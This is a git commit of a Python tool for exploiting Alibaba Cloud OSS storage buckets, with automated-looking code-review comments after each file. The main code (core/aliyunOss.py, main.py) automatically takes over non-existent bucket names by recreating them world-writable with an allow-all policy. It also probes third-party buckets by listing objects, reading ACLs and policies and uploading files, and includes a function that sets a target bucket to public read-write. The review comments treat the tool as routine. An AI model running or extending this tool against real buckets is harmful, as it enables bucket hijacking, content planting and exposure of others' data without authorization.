AliyunOss

Complete the Alibaba Cloud bucket exploitation
UzJu 2022-03-04 19:16:52 +08:00
parent fdfcebe9dd
commit d1eabcb4c0
9 changed files with 608 additions and 0 deletions

BIN
.DS_Store vendored Normal file

Binary file not shown.


@ -1,3 +1,81 @@
# Cloud-Bucket-Leak-Detection-Tools
想写个存储桶的利用,先给自己画个饼
**画饼进度**
1、阿里云存储桶利用
不太会用Git代码写的也烂有BUG直接提Issue即可好像我连issue可能都用不明白
# 0x00 依赖
+ pip3 install oss2
+ pip3 install colorlog
+ pip3 install logging
+ pip3 argparse
# 0x01 使用方法
```bash
git clone https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git
python3 main.py -h
```
随后在config/conf.py中写入自己的阿里云AK作用如下
1、如果可以劫持会用该AK创建同名的存储桶
2、用来验证合法用户
![image-20220304184757595](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220304184757595.png)
## 1、当存储桶Policy权限可获取时
![image-20220304185015693](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220304185015693.png)
## 2、当存储桶不存在时(自动创建并劫持)
![image-20220304185434168](https://uzjumakdown-1256190082.cos.ap-guangzhou.myqcloud.com/UzJuMarkDownImageimage-20220304185434168.png)
输入存储桶地址即可自动检测,功能如下
+ 1、检测当前存储桶是否可劫持
+ 如果可劫持自动在config中写入的AK账号上创建同命名的存储桶并开放所有权限
+ 2、检测当前存储桶是否可列出Object
+ 3、检测当前存储桶是否可获取ACL
+ 4、检测当前存储桶是否可获取Policy策略表
+ 5、检测存储桶是否可上传Object
## 一、阿里云存储桶利用
### 1、实现思路
首先实现了`OssBucketCheckFromSDK`
+ AliyunOssBucketDoesBucketExist
+ 用来判断当前存储桶是否存在首先如果存储桶存在那么就返回一个True继续走下面的流程如果存储桶不存在那么就调用OssBucketExploitFromSDK类创建存储桶并且设置ACL权限上传访问策略随后上传一个文件进行验证如果存储桶此时存在或者为AccessDenied继续走下面的流程
+ AliyunOssGetBucketObjectList
+ 判断是否可以遍历存储桶中的内容如果可以则会选择前3个内容进行遍历并显示
> 如果想遍历更多的内容可以查看aliyunOss.py中的AliyunOssGetBucketObjectList方法
+ AliyunOssGetBucketAcl
+ 判断能否访问当前Bucket的ACL如果可以的话就返回当前Bucket的ACL如果不可以就继续走下面的Check流程
+ AliyunOssGetBucketPolicy
+ 判断能否访问当前Bucket的Policy如果可以的话就会返回当前Bucket的ACL如果不可以就继续走下面的Check
+ AliyunOssGetBucketObject
+ 尝试上传一个文件,是否可以成功上传
###
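Review bot: The dependency list under `# 0x00 依赖` is wrong in two places: `logging` and `argparse` are part of the Python standard library and must not be pip-installed, and `pip3 argparse` is missing the `install` subcommand. The third-party packages this commit actually imports are `oss2`, `colorlog`, `requests` and `fake_useragent` (the last two appear in main.py and config/conf.py but are not listed here), so a `requirements.txt` would serve users better. The method list under `### 1、实现思路` has also drifted from the code: the Policy bullet says the check returns the bucket's ACL where it means the Policy, and the last bullet names `AliyunOssGetBucketObject` while the upload check in core/aliyunOss.py is `AliyunOssPutBucketObject`. The feature list further states that a non-existent bucket is automatically created under the configured AK with all permissions opened; that is a write action in the user's own account that is hard to undo, so it should be called out in the README and gated behind an explicit opt-in flag rather than run by default. Finally, the `.DS_Store` included in this commit should be removed and added to `.gitignore`.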

189 config/BannerInfo.py Normal file

@ -0,0 +1,189 @@
"""
Banner Info From http://patorjk.com/software/taag/#p=display&f=TRaC%20Mini&t=UzJu
"""
import random
Banner_1 = '''
,---._
.-- -.' \
,--, | | :
,'_ /| ,----, : ; | ,--,
.--. | | : .' .`| : | ,'_ /|
,'_ /| : . | .' .' .' | : : .--. | | :
| ' | | . . ,---, ' ./ : ,'_ /| : . |
| | ' | | | ; | .' / | ; || ' | | . .
: | | : ' ; `---' / ;--, ___ l | | ' | | |
| ; ' | | ' / / / .`|/ /\ J :: | : ; ; |
: | : ; ; | ./__; .'/ ../ `..- ,' : `--' \
' : `--' \; | .' \ \ ; : , .-./
: , .-./`---' \ \ ,' `--`----'
`--`----' "---....--'
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_2 = '''
/$$ /$$ /$$$$$
| $$ | $$ |__ $$
| $$ | $$ /$$$$$$$$ | $$ /$$ /$$
| $$ | $$|____ /$$/ | $$| $$ | $$
| $$ | $$ /$$$$/ /$$ | $$| $$ | $$
| $$ | $$ /$$__/ | $$ | $$| $$ | $$
| $$$$$$/ /$$$$$$$$| $$$$$$/| $$$$$$/
\______/ |________/ \______/ \______/
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_3 = '''
.----------------. .----------------. .----------------. .----------------.
| .--------------. || .--------------. || .--------------. || .--------------. |
| | _____ _____ | || | ________ | || | _____ | || | _____ _____ | |
| ||_ _||_ _|| || | | __ _| | || | |_ _| | || ||_ _||_ _|| |
| | | | | | | || | |_/ / / | || | | | | || | | | | | | |
| | | ' ' | | || | .'.' _ | || | _ | | | || | | ' ' | | |
| | \ `--' / | || | _/ /__/ | | || | | |_' | | || | \ `--' / | |
| | `.__.' | || | |________| | || | `.___.' | || | `.__.' | |
| | | || | | || | | || | | |
| '--------------' || '--------------' || '--------------' || '--------------' |
'----------------' '----------------' '----------------' '----------------'
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_4 = '''
.------..------..------..------.
|U.--. ||Z.--. ||J.--. ||U.--. |
| (\/) || :(): || :(): || (\/) |
| :\/: || ()() || ()() || :\/: |
| '--'U|| '--'Z|| '--'J|| '--'U|
`------'`------'`------'`------'
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_5 = '''
___ ___ ___
/\ \ /\__\ ___ /\ \
\:\ \ /::| | /\__\ \:\ \
\:\ \ /:/:| | /:/__/ \:\ \
___ \:\ \ /:/|:| |__ /::\ \ ___ \:\ \
/\ \ \:\__\ /:/ |:| /\__\ \/\:\ \ /\ \ \:\__|
\:\ \ /:/ / \/__|:|/:/ / ~~\:\ \ \:\ \ /:/ /
\:\ /:/ / |:/:/ / \:\__\ \:\ /:/ /
\:\/:/ / |::/ / /:/ / \:\/:/ /
\::/ / |:/ / /:/ / \::/ /
\/__/ |/__/ \/__/ \/__/
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_6 = """
d b sSSSSSs d d b
S S s S S S
S S s S S S
S S s S S S
S S s d P S S
S S s S S S S
"sss" sSSSSSs "sss" "sss"
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
"""
Banner_7 = '''
_ _ _
| | | | ___ _ | | _ _
| |_| | |_ / | || | | +| |
\___/ _/__| _\__/ \_,_|
_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_8 = '''
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_9 = '''
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_10 = '''
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_11 = '''
_ _ _ _ _ _ _ _
(c).-.(c) (c).-.(c) (c).-.(c) (c).-.(c)
/ ._. \ / ._. \ / ._. \ / ._. \
__\( Y )/__ __\( Y )/__ __\( Y )/__ __\( Y )/__
(_.-/'-'\-._)(_.-/'-'\-._)(_.-/'-'\-._)(_.-/'-'\-._)
|| U || || Z || || J || || U ||
_.' `-' '._ _.' `-' '._ _.' `-' '._ _.' `-' '._
(.-./`-'\.-.)(.-./`-'\.-.)(.-./`-'\.-.)(.-./`-'\.-.)
`-' `-' `-' `-' `-' `-' `-' `-'
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_12 = '''
===================================
= ==== ============== ========
= ==== =============== =========
= ==== =============== =========
= ==== == ======= === = =
= ==== ====== ======= === = =
= ==== ===== ======== === = =
= ==== ==== ==== === === = =
= == === ===== === === = =
== === === ===== =
===================================
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
Banner_13 = '''
>=> >=> >=>
>=> >=> >=>
>=> >=> >====>>=> >=> >=> >=>
>=> >=> >=> >=> >=> >=>
>=> >=> >=> >=> >=> >=>
>=> >=> >=> >> >=> >=> >=>
>====> >=======> >===> >==>=>
Autor: UzJu Email: UzJuer@163.com GitHub: github.com/uzju
'''
def echoRandomBannerInfo():
eval(f"print(Banner_{random.randint(1, 13)})")
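Review bot: `echoRandomBannerInfo` builds source text and hands it to `eval` just to look up a variable by name; that is an unnecessary `eval`, and it hides the banner count in the magic number `randint(1, 13)` that must be kept in sync by hand. Put the banners in a list (`BANNERS = [Banner_1, Banner_2, Banner_3]` and so on up to `Banner_13`) and call `print(random.choice(BANNERS))`. `Banner_8`, `Banner_9` and `Banner_10` contain only the author line, so they should be filled in or removed, and `Autor:` in every banner should read `Author:`.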

1 config/UzJu.html Normal file

@ -0,0 +1 @@
Put By https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git

7 config/__init__.py Normal file

@ -0,0 +1,7 @@
#!/usr/bin/python3.8.4 (python版本)
# -*- coding: utf-8 -*-
# @Author : UzJu@菜菜狗
# @Email : UzJuer@163.com
# @Software: PyCharm
# @Time : 2022/2/28 5:25 PM
# @File : __init__.py
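Review bot: The shebang `#!/usr/bin/python3.8.4 (python版本)` is not a valid interpreter line: the kernel passes everything after the path as a single argument, and an interpreter named `/usr/bin/python3.8.4` is unlikely to exist, so executing the file directly fails. Use `#!/usr/bin/env python3`; the same line appears in config/conf.py and core/aliyunOss.py. A package `__init__.py` that holds only a comment header is fine, but the `@Software` and `@Time` tags carry no information and could be dropped.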

17 config/conf.py Normal file

@ -0,0 +1,17 @@
#!/usr/bin/python3.8.4 (python版本)
# -*- coding: utf-8 -*-
# @Author : UzJu@菜菜狗
# @Email : UzJuer@163.com
# @Software: PyCharm
# @Time : 2022/2/28 5:18 PM
# @File : conf.py
from fake_useragent import UserAgent
UA = UserAgent(use_cache_server=False)
headers = {
"UserAgent": UA.random
}
AK = ""
SECRET = ""
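Review bot: `AK = ""` and `SECRET = ""` put the Alibaba Cloud access key in a tracked source file that the README tells users to edit, so a live credential shows up in `git status` and is one careless `git add` away from being committed and pushed. Read them from environment variables instead (for example `os.environ["ALIYUN_AK"]`, the variable name is only a suggestion), or keep `conf.py` in `.gitignore` and commit a `conf.py.example`. Separately, the header dict uses the key `"UserAgent"` but the HTTP header is `User-Agent`; and neither `headers` nor `UA` is used anywhere in this commit while `fake_useragent` is missing from the README dependency list, so either pass `headers` to the `requests.get` call in main.py or remove the import.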

14 config/echoToFile.py Normal file

@ -0,0 +1,14 @@
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Author : UzJu@菜菜狗
# @Email : UzJuer@163.com
# @Software: PyCharm
# @Time : 2022/3/4 下午5:24
# @File : echoToFile.py
import csv
class Echo:
def __init__(self):
pass
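Review bot: `class Echo` has only an empty `__init__` and `import csv` is unused, so this file is a placeholder that does nothing yet; either leave it out of the commit until it has a body, or move the CSV helpers `putCsvInfoResult` and `setCsvHeaders` from core/aliyunOss.py here, since this is evidently meant to be the home for result output. Note that those helpers write to `results/<target>.csv` and nothing in this change creates a `results/` directory.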

202 core/aliyunOss.py Normal file

@ -0,0 +1,202 @@
#!/usr/bin/python3.8.4 (python版本)
# -*- coding: utf-8 -*-
# @Author : UzJu@菜菜狗
# @Email : UzJuer@163.com
# @Software: PyCharm
# @Time : 2022/2/28 4:52 PM
# @File : aliyunOss.py
# 你猜我什么时候画的饼:)
'''
代码实现思路
1使用GET POST PUT的请求来获取
2使用OSS2 SDK实现
'''
# 以下代码思路是使用OssSDK来实现
from itertools import islice
import oss2
import json
from config import conf
import logging
import os
import csv
module_logger = logging.getLogger("mainModule.AliyunOss")
def putCsvInfoResult(target, info):
with open(f'{os.getcwd()}/results/{target}.csv', 'a+', newline='') as f:
f_csv = csv.writer(f)
rows = [
[f"{target}", info]
]
f_csv.writerows(rows)
def setCsvHeaders(target):
headers = ['存储桶地址', '权限']
with open(f'{os.getcwd()}/results/{target}.csv', 'a+', newline='') as f:
f_csv = csv.writer(f)
f_csv.writerow(headers)
class OssBucketExploitFromSDK:
def __init__(self, target, location):
self.target = target
self.location = location
auth = oss2.Auth(conf.AK, conf.SECRET)
self.bucket = oss2.Bucket(auth, f'http://{location}.aliyuncs.com', self.target)
self.logger = logging.getLogger("mainModule.AliyunOss.Exploit.module")
def AliyunOssCreateBucket_Exp(self):
try:
self.bucket.create_bucket()
self.logger.info(f"BucketName {self.target} Ceate Success:)")
self.AliyunOssPutBucketAcl_Exp()
self.AliyunOssPutBucketPolicy_Exp()
self.AliyunOssPutObject_Exp()
self.AliyunOssGetBucketPolicy_Exp()
except Exception as e:
self.logger.warning(f"BucketName {self.target} Ceate FAILD:( {e}")
def AliyunOssPutBucketAcl_Exp(self):
try:
self.bucket.put_bucket_acl(oss2.BUCKET_ACL_PUBLIC_READ_WRITE)
self.logger.info(f"BucketName {self.target} Acl Permissions PUBLIC_READ_WRITE:)")
except Exception as e:
self.logger.warning(f"BucketName {self.target} Acl Put FAILD:( {e}")
def AliyunOssGetBucketPolicy_Exp(self):
try:
result = self.bucket.get_bucket_policy()
policy_json = json.loads(result.policy)
self.logger.info(f"BucketName {self.target} Policy Get Success :)\n {policy_json}")
except Exception as e:
self.logger.warning(f"BucketName {self.target} Policy Get FAILD:( {e}")
def AliyunOssPutBucketPolicy_Exp(self):
try:
bucket_info = self.bucket.get_bucket_info()
strategy = {
"Version": "1",
"Statement": [{
"Effect": "Allow",
"Action": [
"oss:*"
],
"Principal": [
"*"
],
"Resource": [
f"acs:oss:*:{bucket_info.owner.id}:{self.target}",
f"acs:oss:*:{bucket_info.owner.id}:{self.target}/*"
]
}]
}
self.bucket.put_bucket_policy(json.dumps(strategy))
self.logger.info(f"BucketName {self.target} Policy Put Success :)")
except Exception as e:
self.logger.warning(f"BucketName {self.target} Policy Put FAILD:( {e}")
def AliyunOssPutObject_Exp(self):
try:
self.bucket.put_object_from_file("UzJu.html", f"{os.getcwd()}/config/UzJu.html")
self.logger.info(f"BucketName {self.target} Put Object Success:)")
self.logger.info(f"Go Browser Open {self.target}.{self.location}.aliyuncs.com/UzJu.html")
except Exception as e:
self.logger.warning(f"BucketName {self.target} Put Object FAILD:( {e}")
class OssBucketCheckFromSDK:
def __init__(self, target, location):
self.target = target
self.location = location
self.logger = logging.getLogger("mainModule.AliyunOss.module")
auth = oss2.Auth(conf.AK, conf.SECRET)
self.bucket = oss2.Bucket(auth, f'http://{location}.aliyuncs.com', self.target)
self.Exploit = OssBucketExploitFromSDK(self.target, location)
# 设置csvHeaders头
# setCsvHeaders(f"{target}.{location}.aliyuncs.com")
self.headers = [['Bucket', 'ListObject', 'GetBucketPolicy', 'PutBucketPolicy', 'GetBucketAcl', 'PutBucketAcl', 'PutBucketObject']]
self.CheckResult = []
def AliyunOssPutBucketPolicy(self, getOssResource):
"""
PutBucketPolicy
危险操作会更改存储桶的策略组建议查看AliyunOssgetBucketPolicy来自行判断
是否拥有AliyunOssPutBucketPolicy权限如果用代码的方式写入会存在问题
1写入后无法还原当然这里可以使用备份原有的策略然后再上传新的策略这里又会遇到一个新的问题
如果只是存在PutBucketPolicy我们Put后是无法知道对方的ResourceID的
所以该函数只在OssBucketExploitFromSDK类中实现了详情请看AliyunOssPutBucketPolicy_Exp方法
"""
pass
def AliyunOssGetBucketPolicy(self):
try:
result = self.bucket.get_bucket_policy()
policy_json = json.loads(result.policy)
self.logger.info(f"Target: {self.target}, get Bucket Policy:)\n{policy_json}")
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target}, Bucket Policy AccessDenied:(")
def AliyunOssBucketDoesBucketExist(self):
try:
self.bucket.get_bucket_info()
self.logger.info(f"Target: {self.target}, Bucket Exist:)")
return True
except oss2.exceptions.NoSuchBucket:
self.logger.warning(f"Target: {self.target}, NoSuckBucket:) Now Hijack Bucket")
self.Exploit.AliyunOssCreateBucket_Exp()
return False
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target}, AccessDenied:(")
return True
except Exception as e:
self.logger.error(f"Target: {self.target} Except INFO: {e}")
def AliyunOssGetBucketAcl(self):
try:
self.logger.info(f"Target: {self.target} Bucket Acl: {self.bucket.get_bucket_acl().acl}")
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target} get Bucket Acl AccessDenied:(")
def AliyunOssPutbucketAcl(self):
try:
self.bucket.put_bucket_acl(oss2.BUCKET_ACL_PUBLIC_READ_WRITE)
self.logger.info(f"Target: {self.target} Put Bucket Acl Success:)")
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target} Put Bucket Acl AccessDenied:(")
def AliyunOssGetBucketObjectList(self):
try:
self.logger.info("Try to list Object")
for Object in islice(oss2.ObjectIterator(self.bucket), 3):
self.logger.info(f"Object Name: {Object.key}")
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target} ListObject AccessDenid")
return
self.logger.info(f"Target: {self.target} Exsit traverse Object:)")
# putCsvInfoResult(f"{self.target}.{self.location}.aliyuncs.com", "ListObject")
def AliyunOssPutBucketObject(self):
try:
self.bucket.put_object_from_file('UzJu.txt', f'{os.getcwd()}/config/UzJu.html')
self.logger.info(f"Target: {self.target} Put Object Success:)")
self.logger.info(f"Go Browser Open {self.target}.{self.location}.aliyuncs.com/UzJu.html")
except oss2.exceptions.AccessDenied:
self.logger.warning(f"Target: {self.target} Put Object AccessDenied:(")
def CheckBucket(target, location):
try:
check = OssBucketCheckFromSDK(target, location)
if check.AliyunOssBucketDoesBucketExist():
check.AliyunOssGetBucketObjectList()
check.AliyunOssGetBucketAcl()
check.AliyunOssGetBucketPolicy()
check.AliyunOssPutBucketObject()
module_logger.info(">" * 80)
except Exception as e:
module_logger.error(f"Target: {target} Chceck Faild:( {e}")
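Review bot: `AliyunOssBucketDoesBucketExist` turns a read-only check into a write as soon as it sees `NoSuchBucket`: it calls `self.Exploit.AliyunOssCreateBucket_Exp()`, which creates the bucket under the configured AK, sets `oss2.BUCKET_ACL_PUBLIC_READ_WRITE`, and attaches a policy granting `oss:*` to Principal `*`. That leaves a world-writable bucket in the operator's own account, with the billing and abuse exposure that implies, and it happens without any confirmation or flag; gate the exploit path behind an explicit option in `CheckBucket` and keep the ACL and policy private unless the user opts in. The catch-all `except Exception` in the same method returns `None`, so a network error is logged and `CheckBucket` then silently skips every check; return `False` explicitly or re-raise. Smaller points: `AliyunOssPutBucketObject` uploads the object as `UzJu.txt` but logs a URL ending in `UzJu.html`; the `oss2.Bucket` endpoint is built with `http://`, so signed requests and any listed keys cross the wire in clear text, use `https://`; `AliyunOssPutbucketAcl`, `self.headers` and `self.CheckResult` are defined but never used; and the log strings carry typos (`NoSuckBucket`, `Exsit`, `AccessDenid`, `Chceck Faild`, `Ceate`, `FAILD`).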

100 main.py Normal file

@ -0,0 +1,100 @@
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''
@Project UzJuSecurityTools
@File main.py
@Author UzJu
@Date 2022/2/22 18:19
@Email UzJuer@163.com
'''
import logging
import sys
import colorlog
import datetime
from config import BannerInfo
import requests
import argparse
from core import aliyunOss
NowTime = datetime.datetime.now().strftime('%Y-%m-%d_%H_%M_%S')
logger = logging.getLogger("mainModule")
log_colors_config = {
'DEBUG': 'white', # cyan white
'INFO': 'green',
'WARNING': 'yellow',
'ERROR': 'red',
'CRITICAL': 'bold_red',
}
# 输出到控制台
console_handler = logging.StreamHandler()
# 输出到文件
file_handler = logging.FileHandler(filename=f'./logs/{NowTime}.log', mode='a', encoding='utf8')
# 日志级别logger 和 handler以最高级别为准不同handler之间可以不一样不相互影响
logger.setLevel(logging.DEBUG)
console_handler.setLevel(logging.DEBUG)
file_handler.setLevel(logging.INFO)
# 日志输出格式
file_formatter = logging.Formatter(
fmt='[%(asctime)s.%(msecs)03d] %(filename)s -> %(funcName)s line:%(lineno)d [%(levelname)s] : %(message)s',
datefmt='%Y-%m-%d %H:%M:%S'
)
console_formatter = colorlog.ColoredFormatter(
fmt='%(log_color)s[%(asctime)s.%(msecs)03d] %(filename)s -> %(funcName)s line:%(lineno)d [%(levelname)s] : %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
log_colors=log_colors_config
)
console_handler.setFormatter(console_formatter)
file_handler.setFormatter(file_formatter)
# 重复日志问题:
# 1、防止多次addHandler
# 2、loggername 保证每次添加的时候不一样;
# 3、显示完log之后调用removeHandler
if not logger.handlers:
logger.addHandler(console_handler)
logger.addHandler(file_handler)
def initialize(target):
"""
UserDisable
错误消息UserDisable
问题原因账号欠费或者由于安全原因账号被禁用
解决方案请检查账号是否已欠费或联系技术支持进行安全受限核查
"""
try:
resp = requests.get(f"http://{target}")
print("Target>>>> ", target)
print("resp.info>>>> ", resp.text)
if 'html' in resp.text or 'UserDisable' in resp.text:
return False
else:
return True
except requests.exceptions.ConnectionError as e:
logger.error(f"Target: {target}ConnectionError Except INFO: {e}")
return False
if __name__ == '__main__':
BannerInfo.echoRandomBannerInfo()
try:
parser = argparse.ArgumentParser()
parser.add_argument('-aliyun', dest='aliyun', help='python3 -aliyun UzJu.oss-cn-beijing.aliyuncs.com')
parser.add_argument('-f', '--file', dest='file', help='python3 -f/--file url.txt')
args = parser.parse_args()
if args.aliyun:
getTargetBucket = args.aliyun.split(".")
aliyunOss.CheckBucket(getTargetBucket[0], getTargetBucket[1])
if args.file:
with open(args.file, 'r') as f:
for i in f.read().splitlines():
getTargetBucket = i.split(".")
aliyunOss.CheckBucket(getTargetBucket[0], getTargetBucket[1])
except KeyboardInterrupt:
logger.error("KeyError Out")
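Review bot: `logging.FileHandler(filename=f'./logs/{NowTime}.log', ...)` opens the file at import time and raises `FileNotFoundError` when `./logs` does not exist, and this commit creates no such directory, so a fresh clone crashes before the banner prints; add `os.makedirs('logs', exist_ok=True)` before the handler is built (the `results/` path used in core/aliyunOss.py needs the same). `initialize()` and the `requests` import are never used from `__main__`, so either run it as the pre-check it was written to be or drop it. The `KeyboardInterrupt` handler logs `KeyError Out`, which names the wrong exception; `Interrupted by user` is clearer. `args.aliyun.split(".")` indexes `[0]` and `[1]` without a length check, so a bare bucket name or an empty line in `url.txt` raises `IndexError` that the surrounding `try` (which only catches `KeyboardInterrupt`) does not handle; validate the host format first. Finally, `-aliyun` is a single-dash long option, which argparse accepts but which departs from the usual `--aliyun` form used elsewhere in the same parser (`-f`/`--file`).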